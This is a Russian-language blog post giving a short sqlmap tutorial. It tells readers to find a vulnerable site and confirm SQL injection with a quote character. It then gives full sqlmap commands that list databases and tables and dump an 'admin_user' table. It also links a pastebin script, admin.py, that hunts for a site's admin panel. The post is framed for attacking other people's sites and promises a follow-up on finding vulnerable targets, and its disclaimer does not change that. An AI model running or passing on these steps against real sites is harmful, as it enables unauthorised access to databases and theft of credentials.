Sqlmap — мини гайд + admin.py

Здравствуйте уважаемые пользователи и посетители моего блога! Сегодня я решил рассказать вам о такой замечательной штуки как sqlmap она помогает раскрутить sql injection автоматически а не ручками ибо это уже в прошлом 🙂 и так приступим!

Нам понадобится:

1. Python <= 2.7 (https://www.python.org/download/releases/2.7/)
2. Sqlmap (http://sqlmap.org/)

 

Далее ищем сайт с уязвимостью, а как это делать я расскажу в следующей статье про sql injection !

Мы будем рассматривать все на вымышленном примере! (

Ищем сайт с уязвимостью а как это делать я расскажу в другой статье!

http://www.site.com/product.php?id=200 подставляем кавычку и смотрим что же получится.

Видим следующий результат:

Error: SELECT * FROM `category` WHERE is_active=’1′ AND id =200\’
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\» at line 1

Далее берем нашу ссылку (http://www.localhost.com/product.php?id=200)

 

Открываем консоль и пишем:

python «путь к sqlmap.py» -u http://www.localhost.com/product.php?id=200 —dbs —ignore-proxy

Получаем следующий результат:

Далее нам нужна База с именем db363851433 (что бы получить названия таблиц пишем следующее)

Пишем:

python «путь к sqlmap.py»  -u http://www.localhost.com/product.php?id=200 —tables -D db363851433 —ignore-proxy

Получаем список таблиц:

Далее берем нужную нам таблицу (выбираем и вытаскиваем нужную нам информацию):

python «путь к sqlmap.py» -u http://www.localhost.com/product.php?id=200 —columns -D db363851433 -T admin_user —ignore-proxy —dump

Получаем примерно вот такой результат:

 

Вот и весь мини гайд по sqlmap теперь я расскажу про такой скрипт который находит нам админ панель на сайте написан он на питоне.

Качаем сам скрипт (https://pastebin.com/GWJ3eUXA)

Пишем в консоле:

python «путь к admin.py»

Далее вставляем ссылку на сайт: www.localhost.com (пример написания ссылки)

Выбираем типа на чем написан наш сайт:

Наш сайт написан на php а значит выбираем 1 и скрипт начинает поиск!

Когда скрипт найдет админку то он покажет вам следующую строчку

>>www.localhost.com/admin/home.php Admin page found!

 

Вот и все:) спасибо за внимание !

Данная статья опубликована только для ознакомления и автор не несет ответсвенности за действия сделанные людьми прочитавших эту статью.

One Reply to “Sqlmap — мини гайд + admin.py”

Добавить комментарий